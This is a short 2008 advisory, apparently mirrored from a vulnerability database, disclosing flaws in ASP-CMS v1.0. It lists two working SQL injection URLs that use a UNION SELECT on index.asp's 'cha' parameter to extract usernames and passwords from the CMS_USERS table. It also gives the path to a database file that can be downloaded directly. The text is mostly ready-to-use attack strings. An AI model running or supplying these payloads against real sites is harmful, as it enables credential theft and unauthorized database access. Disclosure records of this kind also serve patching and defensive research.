ASP-CMS v.1.0 Sql Injection/Database Disclosure

2008-12-14T00:00:00
ID SECURITYVULNS:DOC:21011
Type securityvulns
Reporter Securityvulns
Modified 2008-12-14T00:00:00

Description

ASP-CMS v.1.0 Sql Injection/Database Disclosure

AUTHOR : Sina Yazdanmehr (R3d.W0rm)

Discovered by : Sina Yazdanmehr (R3d.W0rm)

Our Site : Http://IRCRASH.COM

IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi

Download : http://puzzle.dl.sourceforge.net/sourceforge/asp-cms/asp-cms.18-12-04.zip

DORK : :(

[Sql Injection]

Username : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_username,3,4,5,6,7,8,9,10%20from%20CMS_USERS

Password : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_password,3,4,5,6,7,8,9,10%20from%20CMS_USERS

[Database Disclosure]

http://Site/[path]/mdb-database/ASP-CMS_v100.mdb

Site : Http://IRCRASH.COM

################################ TNX GOD